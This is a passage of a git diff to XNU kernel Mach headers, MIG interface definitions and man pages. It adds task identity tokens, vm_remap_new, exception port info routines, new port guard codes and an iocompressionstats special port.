- * - * @param zone pointer to zone for which element will comes from - * @param zstats pointer to the per-cpu statistics to maintain - * @param waste amount of waste of this allocation (or 0) - * - * @return pointer to usable element - */ -extern vm_offset_t zcache_alloc_from_cpu_cache( - zone_t zone, - zone_stats_t zstats, - vm_size_t waste); - -/** - * @function zcache_drain_depot - * - * @abstract - * Frees all the full magazines from the depot layer to the zone allocator - * Invoked by zone_gc() - * - * @param zone pointer to zone for which the depot layer needs to be drained - */ -extern void zcache_drain_depot( - zone_t zone); - -__END_DECLS - -#pragma GCC visibility pop -#endif /* CONFIG_ZCACHE */ -#endif /* _KERN_ZCACHE_H_ */ diff --git a/osfmk/mach/Makefile b/osfmk/mach/Makefile index 08d6d7511..516ab1443 100644 --- a/osfmk/mach/Makefile +++ b/osfmk/mach/Makefile @@ -64,7 +64,8 @@ MACH_PRIVATE_DEFS = \ sysdiagnose_notification.defs \ upl.defs \ vfs_nspace.defs \ - vm32_map.defs + vm32_map.defs \ + iocompressionstats_notification.defs # # MIG-generated headers that are traditionally used by user @@ -83,6 +84,7 @@ MIG_USHDRS = \ task_access_server.h \ telemetry_notification_server.h \ sysdiagnose_notification_server.h \ + iocompressionstats_notification_server.h \ vfs_nspace_server.h MIG_UUHDRS = \ @@ -183,6 +185,7 @@ PRIVATE_DATAFILES = \ coalition.h \ coalition_notification.defs \ fairplayd_notification.defs \ + iocompressionstats_notification.defs \ arcade_upcall.defs \ host_info.h \ ktrace_background.defs \ @@ -305,6 +308,7 @@ MIG_KUSRC = \ resource_notify_user.c \ task_access_user.c \ telemetry_notification_user.c \ + iocompressionstats_notification_user.c \ upl_user.c \ vfs_nspace_user.c \ vm_map_user.c \ diff --git a/osfmk/mach/arm/traps.h b/osfmk/mach/arm/traps.h index b81e54944..7102db369 100644 --- a/osfmk/mach/arm/traps.h +++ b/osfmk/mach/arm/traps.h @@ -30,3 +30,4 @@ #define MACH_ARM_TRAP_ABSTIME -3 #define MACH_ARM_TRAP_CONTTIME -4 + diff --git 
a/osfmk/mach/exception_types.h b/osfmk/mach/exception_types.h index 31ee691b7..2f9f7274d 100644 --- a/osfmk/mach/exception_types.h +++ b/osfmk/mach/exception_types.h @@ -184,6 +184,7 @@ #include #include #include +#include /* * Exported types */ @@ -199,6 +200,7 @@ typedef exception_mask_t *exception_mask_array_t; typedef exception_behavior_t *exception_behavior_array_t; typedef thread_state_flavor_t *exception_flavor_array_t; typedef mach_port_t *exception_port_array_t; +typedef ipc_info_port_t *exception_port_info_array_t; typedef mach_exception_data_type_t mach_exception_code_t; typedef mach_exception_data_type_t mach_exception_subcode_t; diff --git a/osfmk/mach/host_special_ports.h b/osfmk/mach/host_special_ports.h index d09b44b6b..75ba5e69d 100644 --- a/osfmk/mach/host_special_ports.h +++ b/osfmk/mach/host_special_ports.h @@ -108,9 +108,10 @@ #define HOST_SYSPOLICYD_PORT (22 + HOST_MAX_SPECIAL_KERNEL_PORT) #define HOST_FILECOORDINATIOND_PORT (23 + HOST_MAX_SPECIAL_KERNEL_PORT) #define HOST_FAIRPLAYD_PORT (24 + HOST_MAX_SPECIAL_KERNEL_PORT) +#define HOST_IOCOMPRESSIONSTATS_PORT (25 + HOST_MAX_SPECIAL_KERNEL_PORT) -#define HOST_MAX_SPECIAL_PORT HOST_FAIRPLAYD_PORT -/* MAX = last since rdar://35861175 */ +#define HOST_MAX_SPECIAL_PORT HOST_IOCOMPRESSIONSTATS_PORT +/* MAX = last since rdar://59872249 */ /* obsolete name */ #define HOST_CHUD_PORT HOST_LAUNCHCTL_PORT @@ -274,6 +275,13 @@ #define host_set_fairplayd_port(host, port) \ (host_set_special_port((host), HOST_FAIRPLAYD_PORT, (port))) +#define host_get_iocompressionstats_port(host, port) \ + (host_get_special_port((host), \ + HOST_LOCAL_NODE, HOST_IOCOMPRESSIONSTATS_PORT, (port))) +#define host_set_iocompressionstats_port(host, port) \ + (host_set_special_port((host), HOST_IOCOMPRESSIONSTATS_PORT, (port))) + + /* HOST_RESOURCE_NOTIFY_PORT doesn't #defines these conveniences. 
* All lookups go through send_resource_violation() */ diff --git a/osfmk/mach/iocompressionstats_notification.defs b/osfmk/mach/iocompressionstats_notification.defs new file mode 100644 index 000000000..a46c31473 --- /dev/null +++ b/osfmk/mach/iocompressionstats_notification.defs @@ -0,0 +1,20 @@ +/* + * Copyright (c) 2020, Apple Inc. All rights reserved. + */ + + /* + * Interface definition for the telemetry facility. + */ + +subsystem +#if KERNEL_USER + KernelUser +#endif /* KERNEL_USER */ + iocompressionstats_notification 5600; + +#include +#include + +simpleroutine iocompressionstats_notification( + RequestPort iocompressionstats_port : mach_port_t; + in flags : uint32_t); diff --git a/osfmk/mach/kern_return.h b/osfmk/mach/kern_return.h index d32182600..addc157f1 100644 --- a/osfmk/mach/kern_return.h +++ b/osfmk/mach/kern_return.h @@ -327,6 +327,14 @@ /* Denied by security policy */ +#define KERN_MISSING_KC 54 +/* The KC on which the function is operating is missing + */ + +#define KERN_INVALID_KC 55 +/* The KC on which the function is operating is invalid + */ + #define KERN_RETURN_MAX 0x100 /* Maximum return value allowable */ diff --git a/osfmk/mach/mach_traps.h b/osfmk/mach/mach_traps.h index b7a9bdd1c..7341d83d2 100644 --- a/osfmk/mach/mach_traps.h +++ b/osfmk/mach/mach_traps.h @@ -162,6 +162,11 @@ extern kern_return_t _kernelrpc_mach_vm_deallocate_trap( mach_vm_size_t size ); +extern kern_return_t task_dyld_process_info_notify_get( + mach_port_name_array_t names_addr, + natural_t *names_count_addr + ); + extern kern_return_t _kernelrpc_mach_vm_protect_trap( mach_port_name_t target, mach_vm_address_t address, @@ -662,6 +667,14 @@ struct _kernelrpc_mach_vm_deallocate_args { extern kern_return_t _kernelrpc_mach_vm_deallocate_trap( struct _kernelrpc_mach_vm_deallocate_args *args); +struct task_dyld_process_info_notify_get_trap_args { + PAD_ARG_(mach_vm_address_t, names_addr); /* 2 words */ + PAD_ARG_(mach_vm_address_t, names_count_addr); /* 2 words */ +}; /* 
Total: 4 */ + +extern kern_return_t task_dyld_process_info_notify_get_trap( + struct task_dyld_process_info_notify_get_trap_args *args); + struct _kernelrpc_mach_vm_protect_args { PAD_ARG_(mach_port_name_t, target); /* 1 word */ PAD_ARG_(mach_vm_address_t, address); /* 2 words */ diff --git a/osfmk/mach/mach_types.defs b/osfmk/mach/mach_types.defs index 25e03e784..8ef422d35 100644 --- a/osfmk/mach/mach_types.defs +++ b/osfmk/mach/mach_types.defs @@ -168,6 +168,14 @@ type task_read_t = mach_port_t #endif /* KERNEL_SERVER */ ; +type task_id_token_t = mach_port_t +#if KERNEL_SERVER + intran: task_id_token_t convert_port_to_task_id_token(mach_port_t) + outtran: mach_port_t convert_task_id_token_to_port(task_id_token_t) + destructor: task_id_token_release(task_id_token_t) +#endif /* KERNEL_SERVER */ + ; + type thread_t = mach_port_t #if KERNEL_SERVER intran: thread_t convert_port_to_thread(mach_port_t) @@ -578,9 +586,14 @@ type exception_behavior_t = int; type exception_handler_t = mach_port_t; +type exception_handler_info_t = struct[2] of natural_t; + type exception_handler_array_t = array[*:32] of exception_handler_t; +type exception_handler_info_array_t = + array[*:32] of exception_handler_info_t; + type exception_behavior_array_t = array[*:32] of exception_behavior_t; @@ -716,24 +729,25 @@ type dyld_kernel_process_info_t = struct[64] of MACH_MSG_TYPE_BYTE; #ifdef MACH_KERNEL_PRIVATE simport ; /* for voucher conversions */ simport ; /* for null conversion */ -simport ; /* for task/thread conversion */ -simport ; /* for host/processor/pset conversions */ +simport ; /* for task/thread conversion */ +simport ; /* for host/processor/pset conversions */ simport ; /* for lock_set and semaphore conversions */ -simport ; /* for ledger conversions */ -simport ; /* for processor conversions */ -simport ; /* for lock-set conversions */ -simport ; /* for semaphore conversions */ +simport ; /* for ledger conversions */ +simport ; /* for processor conversions */ +simport ; /* for 
lock-set conversions */ +simport ; /* for semaphore conversions */ simport ; /* for eventlink conversions */ simport ; /* for memory object type conversions */ -simport ; /* for vm_map conversions */ +simport ; /* for vm_map conversions */ #if CONFIG_ARCADE -simport ; /* for arcade_register conversions */ +simport ; /* for arcade_register conversions */ #endif #endif /* MACH_KERNEL_PRIVATE */ -simport ; /* pick up kernel-specific MIG things */ +simport ; /* pick up kernel-specific MIG things */ simport ; +simport ; /* for task_id_token conversions */ #endif /* KERNEL_SERVER */ import ; diff --git a/osfmk/mach/mach_types.h b/osfmk/mach/mach_types.h index bf5c680b2..70ff57875 100644 --- a/osfmk/mach/mach_types.h +++ b/osfmk/mach/mach_types.h @@ -137,6 +137,7 @@ typedef struct arcade_register *arcade_register_t; typedef struct ipc_eventlink *ipc_eventlink_t; typedef struct ipc_port *eventlink_port_pair_t[2]; typedef struct suid_cred *suid_cred_t; +typedef struct task_id_token *task_id_token_t; /* * OBSOLETE: lock_set interfaces are obsolete. @@ -203,6 +204,7 @@ typedef mach_port_t arcade_register_t; typedef mach_port_t ipc_eventlink_t; typedef mach_port_t eventlink_port_pair_t[2]; typedef mach_port_t suid_cred_t; +typedef mach_port_t task_id_token_t; #endif /* KERNEL */ @@ -226,6 +228,8 @@ typedef mach_port_t io_master_t; typedef mach_port_t UNDServerRef; typedef mach_port_t mach_eventlink_t; +typedef ipc_info_port_t exception_handler_info_t; + /* * Mig doesn't translate the components of an array. 
* For example, Mig won't use the thread_t translations @@ -305,6 +309,7 @@ typedef uint32_t suid_cred_uid_t; #define MACH_EVENTLINK_NULL ((mach_eventlink_t) 0) #define IPC_EVENTLINK_NULL ((ipc_eventlink_t) NULL) #define SUID_CRED_NULL ((suid_cred_t) NULL) +#define TASK_ID_TOKEN_NULL ((task_id_token_t) NULL) #else #define TASK_NULL ((task_t) 0) #define TASK_NAME_NULL ((task_name_t) 0) @@ -334,6 +339,7 @@ typedef uint32_t suid_cred_uid_t; #define MACH_EVENTLINK_NULL ((mach_eventlink_t) 0) #define IPC_EVENTLINK_NULL ((ipc_eventlink_t) 0) #define SUID_CRED_NULL ((suid_cred_t) 0) +#define TASK_ID_TOKEN_NULL ((task_id_token_t) 0) #endif /* capability strictly _DECREASING_. @@ -341,19 +347,19 @@ typedef uint32_t suid_cred_uid_t; * to be closest to the itk_lock. see task.h. */ typedef unsigned int mach_task_flavor_t; -#define TASK_FLAVOR_CONTROL 0 /* a task_t */ +#define TASK_FLAVOR_CONTROL 0 /* a task_t */ #define TASK_FLAVOR_READ 1 /* a task_read_t */ #define TASK_FLAVOR_INSPECT 2 /* a task_inspect_t */ #define TASK_FLAVOR_NAME 3 /* a task_name_t */ /* capability strictly _DECREASING_ */ typedef unsigned int mach_thread_flavor_t; -#define THREAD_FLAVOR_CONTROL 0 /* a thread_t */ +#define THREAD_FLAVOR_CONTROL 0 /* a thread_t */ #define THREAD_FLAVOR_READ 1 /* a thread_read_t */ #define THREAD_FLAVOR_INSPECT 2 /* a thread_inspect_t */ /* DEPRECATED */ -typedef natural_t ledger_item_t; +typedef natural_t ledger_item_t; #define LEDGER_ITEM_INFINITY ((ledger_item_t) (~0)) typedef int64_t ledger_amount_t; diff --git a/osfmk/mach/mach_vm.defs b/osfmk/mach/mach_vm.defs index 94f3db918..df2466fa9 100644 --- a/osfmk/mach/mach_vm.defs +++ b/osfmk/mach/mach_vm.defs @@ -509,6 +509,30 @@ routine mach_vm_page_range_query( skip; #endif +/* + * Map portion of a task's address space, {max, cur}_protection is inout. 
+ */ +#if !defined(_MACH_VM_PUBLISH_AS_LOCAL_) +routine PREFIX(KERNEL_SERVER_SUFFIX(mach_vm_remap_new)) ( +#else +routine PREFIX(KERNEL_SERVER_SUFFIX(vm_remap_new)) ( +#endif + target_task : vm_map_t; + inout target_address : mach_vm_address_t; + size : mach_vm_size_t; + mask : mach_vm_offset_t; + flags : int; +#ifdef KERNEL_SERVER + src_tport : mach_port_t; +#else + src_task : vm_map_read_t; +#endif + src_address : mach_vm_address_t; + copy : boolean_t; + inout cur_protection : vm_prot_t; + inout max_protection : vm_prot_t; + inheritance : vm_inherit_t); + /****************************** Legacy section ***************************/ /* The following definitions are exist to provide compatibility with */ /* the legacy APIs. They are no different. We just need to produce */ diff --git a/osfmk/mach/mach_voucher.defs b/osfmk/mach/mach_voucher.defs index 3decdd8aa..3ec4e9870 100644 --- a/osfmk/mach/mach_voucher.defs +++ b/osfmk/mach/mach_voucher.defs @@ -66,7 +66,7 @@ routine mach_voucher_attr_command( /* extract a recipe array to reconstitue all the key values in a future voucher */ routine mach_voucher_debug_info( - task : ipc_space_t; + task : ipc_space_read_t; voucher_name: mach_port_name_t; out recipes : mach_voucher_attr_raw_recipe_array_t, CountInOut); diff --git a/osfmk/mach/memory_object_types.h b/osfmk/mach/memory_object_types.h index b7d4a4659..a3f35d645 100644 --- a/osfmk/mach/memory_object_types.h +++ b/osfmk/mach/memory_object_types.h @@ -79,6 +79,15 @@ #include +#if XNU_KERNEL_PRIVATE +#include +#if __LP64__ +#define MEMORY_OBJECT_HAS_REFCOUNT 1 +#else +#define MEMORY_OBJECT_HAS_REFCOUNT 0 +#endif +#endif /* XNU_KERNEL_PRIVATE */ + #define VM_64_BIT_DATA_OBJECTS typedef unsigned long long memory_object_offset_t; @@ -100,24 +109,31 @@ typedef natural_t mo_ipc_object_bits_t; struct memory_object_pager_ops; /* forward declaration */ +typedef struct vm_object *memory_object_control_t; /* - * "memory_object" and "memory_object_control" types used to be Mach 
ports - * in user space and can be passed as such to some kernel APIs. - * Their first field must match the "io_bits" field of a - * "struct ipc_object" to identify them as a "IKOT_MEMORY_OBJECT" and - * "IKOT_MEM_OBJ_CONTROL" respectively. + * "memory_object" used to be a Mach port in user space and could be passed + * as such to some kernel APIs. + * + * Its first field must match the "io_bits" field of a + * "struct ipc_object" to identify them as a "IKOT_MEMORY_OBJECT". */ -typedef struct memory_object { +typedef struct memory_object { mo_ipc_object_bits_t mo_ikot; /* DO NOT CHANGE */ +#if __LP64__ +#if XNU_KERNEL_PRIVATE + /* + * On LP64 there's a 4 byte hole that is perfect for a refcount. + * Expose it so that all pagers can take advantage of it. + */ + os_ref_atomic_t mo_ref; +#else + unsigned int __mo_padding; +#endif /* XNU_KERNEL_PRIVATE */ +#endif /* __LP64__ */ const struct memory_object_pager_ops *mo_pager_ops; - struct memory_object_control *mo_control; + memory_object_control_t mo_control; } *memory_object_t; -typedef struct memory_object_control { - mo_ipc_object_bits_t moc_ikot; /* DO NOT CHANGE */ - struct vm_object *moc_object; -} *memory_object_control_t; - typedef const struct memory_object_pager_ops { void (*memory_object_reference)( memory_object_t mem_obj); @@ -177,6 +193,11 @@ typedef const struct memory_object_pager_ops { #else /* KERNEL_PRIVATE */ typedef mach_port_t memory_object_t; +/* + * vestigial, maintained for source compatibility, + * no MIG interface will accept or return non NULL + * objects for those. 
+ */ typedef mach_port_t memory_object_control_t; #endif /* KERNEL_PRIVATE */ @@ -441,10 +462,8 @@ typedef struct memory_object_attr_info memory_object_attr_info_data_t; #define MAX_UPL_TRANSFER_BYTES (1024 * 1024) #define MAX_UPL_SIZE_BYTES (1024 * 1024 * 64) -#ifndef CONFIG_EMBEDDED #define MAX_UPL_SIZE (MAX_UPL_SIZE_BYTES / PAGE_SIZE) #define MAX_UPL_TRANSFER (MAX_UPL_TRANSFER_BYTES / PAGE_SIZE) -#endif struct upl_page_info { ppnum_t phys_addr; /* physical page index number */ diff --git a/osfmk/mach/port.h b/osfmk/mach/port.h index a70035edd..9472cecea 100644 --- a/osfmk/mach/port.h +++ b/osfmk/mach/port.h @@ -142,8 +142,13 @@ typedef struct ipc_port *ipc_port_t; #define IPC_PORT_NULL ((ipc_port_t) NULL) #define IPC_PORT_DEAD ((ipc_port_t)~0UL) -#define IPC_PORT_VALID(port) \ - ((port) != IPC_PORT_NULL && (port) != IPC_PORT_DEAD) +#define IPC_PORT_VALID(port) ipc_port_valid(port) + +static inline boolean_t +ipc_port_valid(ipc_port_t port) +{ + return port != IPC_PORT_DEAD && port; +} typedef ipc_port_t mach_port_t; @@ -269,7 +274,6 @@ typedef mach_port_type_t *mach_port_type_array_t; #define MACH_PORT_TYPE_DEAD_NAME MACH_PORT_TYPE(MACH_PORT_RIGHT_DEAD_NAME) #define MACH_PORT_TYPE_LABELH MACH_PORT_TYPE(MACH_PORT_RIGHT_LABELH) /* obsolete */ - #ifdef MACH_KERNEL_PRIVATE /* Holder used to have a receive right - remembered to filter exceptions */ #define MACH_PORT_TYPE_EX_RECEIVE MACH_PORT_TYPE_LABELH @@ -451,9 +455,16 @@ enum mach_port_guard_exception_codes { kGUARD_EXC_SEND_INVALID_RIGHT = 1u << 18, kGUARD_EXC_RCV_INVALID_NAME = 1u << 19, kGUARD_EXC_RCV_GUARDED_DESC = 1u << 20, /* should never be fatal; for development only */ + kGUARD_EXC_MOD_REFS_NON_FATAL = 1u << 21, + kGUARD_EXC_IMMOVABLE_NON_FATAL = 1u << 22, }; -#define MAX_FATAL_kGUARD_EXC_CODE (1u << 6) +#define MAX_FATAL_kGUARD_EXC_CODE (1u << 7) + +/* + * Mach port guard flags. + */ +#define MPG_FLAGS_NONE (0x00ull) /* * These flags are used as bits in the subcode of kGUARD_EXC_STRICT_REPLY exceptions. 
@@ -465,6 +476,16 @@ enum mach_port_guard_exception_codes { #define MPG_FLAGS_STRICT_REPLY_MISMATCHED_PERSONA (0x10ull << 56) #define MPG_FLAGS_STRICT_REPLY_MASK (0xffull << 56) +/* + * These flags are used as bits in the subcode of kGUARD_EXC_MOD_REFS exceptions. + */ +#define MPG_FLAGS_MOD_REFS_PINNED_DEALLOC (0x01ull << 56) + +/* + * These flags are used as bits in the subcode of kGUARD_EXC_IMMOVABLE exceptions. + */ +#define MPG_FLAGS_IMMOVABLE_PINNED (0x01ull << 56) + /* * Flags for mach_port_guard_with_flags. These flags extend * the attributes associated with a guarded port. diff --git a/osfmk/mach/syscall_sw.h b/osfmk/mach/syscall_sw.h index dd9bd8404..727190581 100644 --- a/osfmk/mach/syscall_sw.h +++ b/osfmk/mach/syscall_sw.h @@ -86,6 +86,7 @@ kernel_trap(_kernelrpc_mach_vm_allocate_trap,-10,5) /* 4 args, +1 for mach_vm_size_t */ kernel_trap(_kernelrpc_mach_vm_purgable_control_trap,-11,5) /* 4 args, +1 for mach_vm_offset_t */ kernel_trap(_kernelrpc_mach_vm_deallocate_trap,-12,5) /* 3 args, +2 for mach_vm_size_t and mach_vm_address_t */ +kernel_trap(task_dyld_process_info_notify_get,-13,4) /* 2 args, +2 for mach_vm_address_t */ kernel_trap(_kernelrpc_mach_vm_protect_trap,-14,7) /* 5 args, +2 for mach_vm_address_t and mach_vm_size_t */ kernel_trap(_kernelrpc_mach_vm_map_trap,-15,9) kernel_trap(_kernelrpc_mach_port_allocate_trap,-16,3) diff --git a/osfmk/mach/task.defs b/osfmk/mach/task.defs index 9e82450c7..fb6beab76 100644 --- a/osfmk/mach/task.defs +++ b/osfmk/mach/task.defs @@ -72,6 +72,12 @@ subsystem #include #include +#if !KERNEL && !LIBSYSCALL_INTERFACE +#define PREFIX(NAME) _kernelrpc_ ## NAME +#else +#define PREFIX(NAME) NAME +#endif + /* * Create a new task with an empty set of IPC rights, * and having an address space constructed from the @@ -153,7 +159,7 @@ routine task_set_info( * count for that task is non-zero. 
*/ routine task_suspend( - target_task : task_t); + target_task : task_read_t); /* @@ -163,7 +169,7 @@ routine task_suspend( * that also have non-zero suspend counts may execute. */ routine task_resume( - target_task : task_t); + target_task : task_read_t); /* * Returns the current value of the selected special port @@ -266,7 +272,7 @@ routine task_swap_exception_ports( behavior : exception_behavior_t; new_flavor : thread_state_flavor_t; out masks : exception_mask_array_t; - out old_handlerss : exception_handler_array_t, SameCount; + out old_handlers : exception_handler_array_t, SameCount; out old_behaviors : exception_behavior_array_t, SameCount; out old_flavors : exception_flavor_array_t, SameCount); @@ -455,7 +461,7 @@ routine task_set_phys_footprint_limit( out old_limit : int); routine task_suspend2( - target_task : task_t; + target_task : task_read_t; out suspend_token : task_suspension_token_t); routine task_resume2( @@ -480,7 +486,7 @@ routine task_swap_mach_voucher( inout old_voucher : ipc_voucher_t); routine task_generate_corpse( - task :task_t; + task :task_read_t; out corpse_task_port:mach_port_t); routine task_map_corpse_info( @@ -540,5 +546,39 @@ routine task_create_suid_cred( uid : suid_cred_uid_t; out delegation : suid_cred_t); +#if KERNEL || (!KERNEL && !LIBSYSCALL_INTERFACE) +routine PREFIX(mach_task_is_self)( + task : task_name_t; + out is_self : boolean_t); +#else + /* Do not generate header, use the one in mach_init.h */ + skip; +#endif + +routine task_dyld_process_info_notify_register( + target_task : task_read_t; + notify : mach_port_make_send_t); + +routine task_create_identity_token( + task : task_t; + out token : task_id_token_t); + +routine task_identity_token_get_task_port( + token : task_id_token_t; + flavor : task_flavor_t; + out task_port: mach_port_t); + +routine task_dyld_process_info_notify_deregister( + target_task : task_read_t; + notify : mach_port_name_t); + +routine task_get_exception_ports_info( + port : mach_port_t; + 
exception_mask : exception_mask_t; + out masks : exception_mask_array_t; + out old_handlers_info : exception_handler_info_array_t, SameCount; + out old_behaviors : exception_behavior_array_t, SameCount; + out old_flavors : exception_flavor_array_t, SameCount); + /* vim: set ft=c : */ diff --git a/osfmk/mach/task_access.defs b/osfmk/mach/task_access.defs index 1696fd3cf..8974f5dd6 100644 --- a/osfmk/mach/task_access.defs +++ b/osfmk/mach/task_access.defs @@ -56,4 +56,12 @@ routine find_code_signature( task_access_port : mach_port_t; new_pid : int32_t); +routine check_task_access_with_flavor( + task_access_port : mach_port_t; + calling_pid : int32_t; + calling_gid : uint32_t; + target_pid : int32_t; + flavor : mach_task_flavor_t; + ServerAuditToken caller_cred : audit_token_t); + /* vim: set ft=c : */ diff --git a/osfmk/mach/task_special_ports.h b/osfmk/mach/task_special_ports.h index a2840ed89..fa561750f 100644 --- a/osfmk/mach/task_special_ports.h +++ b/osfmk/mach/task_special_ports.h @@ -81,7 +81,9 @@ typedef int task_special_port_t; #define TASK_READ_PORT 6 /* The read port for task. */ - +/* + * Evolving and likely to change. + */ #define TASK_SEATBELT_PORT 7 /* Seatbelt compiler/DEM port for task. */ diff --git a/osfmk/mach/thread_act.defs b/osfmk/mach/thread_act.defs index e7f20e54c..162f0f54b 100644 --- a/osfmk/mach/thread_act.defs +++ b/osfmk/mach/thread_act.defs @@ -164,14 +164,14 @@ thread_set_state( * for its task is also zero. */ routine thread_suspend( - target_act : thread_act_t); + target_act : thread_read_t); /* * Decrement the suspend count for the target thread, * if that count is not already zero. 
*/ routine thread_resume( - target_act : thread_act_t); + target_act : thread_read_t); /* * Cause any user or meta- instructions currently being @@ -385,6 +385,17 @@ routine thread_convert_thread_state( out out_state : thread_state_t, CountInOut); #ifdef XNU_KERNEL_PRIVATE -#endif + skip; +#else + skip; +#endif /* XNU_KERNEL_PRIVATE */ + +routine thread_get_exception_ports_info( + port : mach_port_t; + exception_mask : exception_mask_t; + out masks : exception_mask_array_t; + out old_handlers_info : exception_handler_info_array_t, SameCount; + out old_behaviors : exception_behavior_array_t, SameCount; + out old_flavors : exception_flavor_array_t, SameCount); /* vim: set ft=c : */ diff --git a/osfmk/mach/thread_special_ports.h b/osfmk/mach/thread_special_ports.h index 7bb1bea5a..1a24db516 100644 --- a/osfmk/mach/thread_special_ports.h +++ b/osfmk/mach/thread_special_ports.h @@ -73,6 +73,7 @@ #define THREAD_READ_PORT 3 /* The read port for thread. */ +#define THREAD_MAX_SPECIAL_PORT THREAD_READ_PORT /* * Definitions for ease of use */ diff --git a/osfmk/mach/vm_map.defs b/osfmk/mach/vm_map.defs index 7caa92639..14f172e4b 100644 --- a/osfmk/mach/vm_map.defs +++ b/osfmk/mach/vm_map.defs @@ -506,5 +506,21 @@ routine PREFIX(vm_purgable_control) ( routine vm_map_exec_lockdown( target_task : vm_map_t); +routine PREFIX(KERNEL_SERVER_SUFFIX(vm_remap_new)) ( + target_task : vm_map_t; +inout target_address : vm_address_t; + size : vm_size_t; + mask : vm_address_t; + flags : int; +#ifdef KERNEL_SERVER + src_tport : mach_port_t; +#else + src_task : vm_map_read_t; +#endif + src_address : vm_address_t; + copy : boolean_t; +inout cur_protection : vm_prot_t; +inout max_protection : vm_prot_t; + inheritance : vm_inherit_t); /* vim: set ft=c : */ diff --git a/osfmk/mach/vm_param.h b/osfmk/mach/vm_param.h index 9a518a2bb..e87b5d1b7 100644 --- a/osfmk/mach/vm_param.h +++ b/osfmk/mach/vm_param.h @@ -242,7 +242,7 @@ extern uint64_t max_mem; /* 64-bit size of memory - limit * When we need 
to allocate a chunk of anonymous memory over that size, * we have to allocate more than one chunk. */ -#define ANON_MAX_SIZE 0xFFFFF000ULL +#define ANON_MAX_SIZE ((1ULL << 32) - PAGE_SIZE) /* * Work-around for * Break large anonymous memory areas into 128MB chunks to alleviate diff --git a/osfmk/mach/vm_statistics.h b/osfmk/mach/vm_statistics.h index 3de128669..f3038106e 100644 --- a/osfmk/mach/vm_statistics.h +++ b/osfmk/mach/vm_statistics.h @@ -309,6 +309,7 @@ typedef struct pmap_statistics *pmap_statistics_t; #define VM_FLAGS_NO_CACHE 0x0010 #define VM_FLAGS_RESILIENT_CODESIGN 0x0020 #define VM_FLAGS_RESILIENT_MEDIA 0x0040 +#define VM_FLAGS_PERMANENT 0x0080 #define VM_FLAGS_OVERWRITE 0x4000 /* delete any existing mappings first */ /* * VM_FLAGS_SUPERPAGE_MASK @@ -334,6 +335,7 @@ typedef struct pmap_statistics *pmap_statistics_t; VM_FLAGS_4GB_CHUNK | \ VM_FLAGS_RANDOM_ADDR | \ VM_FLAGS_NO_CACHE | \ + VM_FLAGS_PERMANENT | \ VM_FLAGS_OVERWRITE | \ VM_FLAGS_SUPERPAGE_MASK | \ VM_FLAGS_ALIAS_MASK) @@ -688,8 +690,9 @@ typedef struct { #define VM_KERN_MEMORY_SKYWALK 26 #define VM_KERN_MEMORY_LTABLE 27 #define VM_KERN_MEMORY_HV 28 +#define VM_KERN_MEMORY_RETIRED 29 -#define VM_KERN_MEMORY_FIRST_DYNAMIC 29 +#define VM_KERN_MEMORY_FIRST_DYNAMIC 30 /* out of tags: */ #define VM_KERN_MEMORY_ANY 255 #define VM_KERN_MEMORY_COUNT 256 diff --git a/osfmk/mach/vm_types.h b/osfmk/mach/vm_types.h index e29742be6..2b02e84a5 100644 --- a/osfmk/mach/vm_types.h +++ b/osfmk/mach/vm_types.h @@ -160,10 +160,8 @@ struct vm_allocation_total { }; struct vm_allocation_zone_total { - uint64_t total; - uint64_t peak; - uint32_t waste; - uint32_t wastediv; + vm_size_t vazt_total; + vm_size_t vazt_peak; }; typedef struct vm_allocation_zone_total vm_allocation_zone_total_t; diff --git a/osfmk/mach_debug/ipc_info.h b/osfmk/mach_debug/ipc_info.h index 520830894..c0e387b16 100644 --- a/osfmk/mach_debug/ipc_info.h +++ b/osfmk/mach_debug/ipc_info.h @@ -113,4 +113,11 @@ typedef struct ipc_info_tree_name 
{ typedef ipc_info_tree_name_t *ipc_info_tree_name_array_t; +typedef struct ipc_info_port { + natural_t iip_port_object; /* port object identifier */ + natural_t iip_receiver_object; /* receiver task identifier (if any) */ +} ipc_info_port_t; + +typedef ipc_info_port_t *exception_handler_info_array_t; + #endif /* _MACH_DEBUG_IPC_INFO_H_ */ diff --git a/osfmk/machine/machine_routines.h b/osfmk/machine/machine_routines.h index 40eae37e9..7f2508772 100644 --- a/osfmk/machine/machine_routines.h +++ b/osfmk/machine/machine_routines.h @@ -51,13 +51,6 @@ __BEGIN_DECLS */ bool ml_cpu_can_exit(int cpu_id); -/*! - * @function ml_cpu_init_state - * @brief Needs to be called from schedulable context prior to using - * the ml_cpu_*_state_transition or ml_cpu_*_loop functions. - */ -void ml_cpu_init_state(void); - /*! * @function ml_cpu_begin_state_transition * @brief Tell the platform code that processor_start() or diff --git a/osfmk/man/task_get_special_port.html b/osfmk/man/task_get_special_port.html index 9ff80bc28..f6ccb2bea 100644 --- a/osfmk/man/task_get_special_port.html +++ b/osfmk/man/task_get_special_port.html @@ -46,8 +46,8 @@ values are:
TASK_KERNEL_PORT
[task-self send right] The port used to control this task. Used -to send messages that affect the task. This is the port returned -by mach_task_self. +to send messages that affect the task. This is the movable task port and +different from the one returned by mach_task_self (immovable).

TASK_BOOTSTRAP_PORT
diff --git a/osfmk/man/task_set_special_port.html b/osfmk/man/task_set_special_port.html index 55cc0d716..1cabc6171 100644 --- a/osfmk/man/task_set_special_port.html +++ b/osfmk/man/task_set_special_port.html @@ -51,10 +51,10 @@ messages requesting return of other system service ports.
TASK_KERNEL_PORT
[task-self send right] The task's kernel port. Used by the -kernel to receive messages to manipulate the task. This is the -port returned by mach_task_self. Setting this special port -does not change the identity of the kernel port that names the -task; this simply changes the value returned as the kernel +kernel to receive messages to manipulate the task. This is the movable task +port and different from the one returned by mach_task_self +(immovable). Setting this special port does not change the identity of the +kernel port that names the task; this simply changes the value returned as the kernel special port.

TASK_HOST_NAME_PORT diff --git a/osfmk/man/thread_get_special_port.html b/osfmk/man/thread_get_special_port.html index f8e0abba6..ee0639063 100644 --- a/osfmk/man/thread_get_special_port.html +++ b/osfmk/man/thread_get_special_port.html @@ -36,8 +36,8 @@ values are:
THREAD_KERNEL_PORT
[thread-self send right] The port used to name the thread. -Used to invoke operations that affect the thread. This is the -port returned by mach_thread_self. +Used to invoke operations that affect the thread. This is the movable +port for the thread and different from mach_thread_self (immovable).

special_port diff --git a/osfmk/man/thread_set_special_port.html b/osfmk/man/thread_set_special_port.html index 251d27536..9fa9605b8 100644 --- a/osfmk/man/thread_set_special_port.html +++ b/osfmk/man/thread_set_special_port.html @@ -33,8 +33,8 @@ The special port to be set. Valid values are:
THREAD_KERNEL_PORT
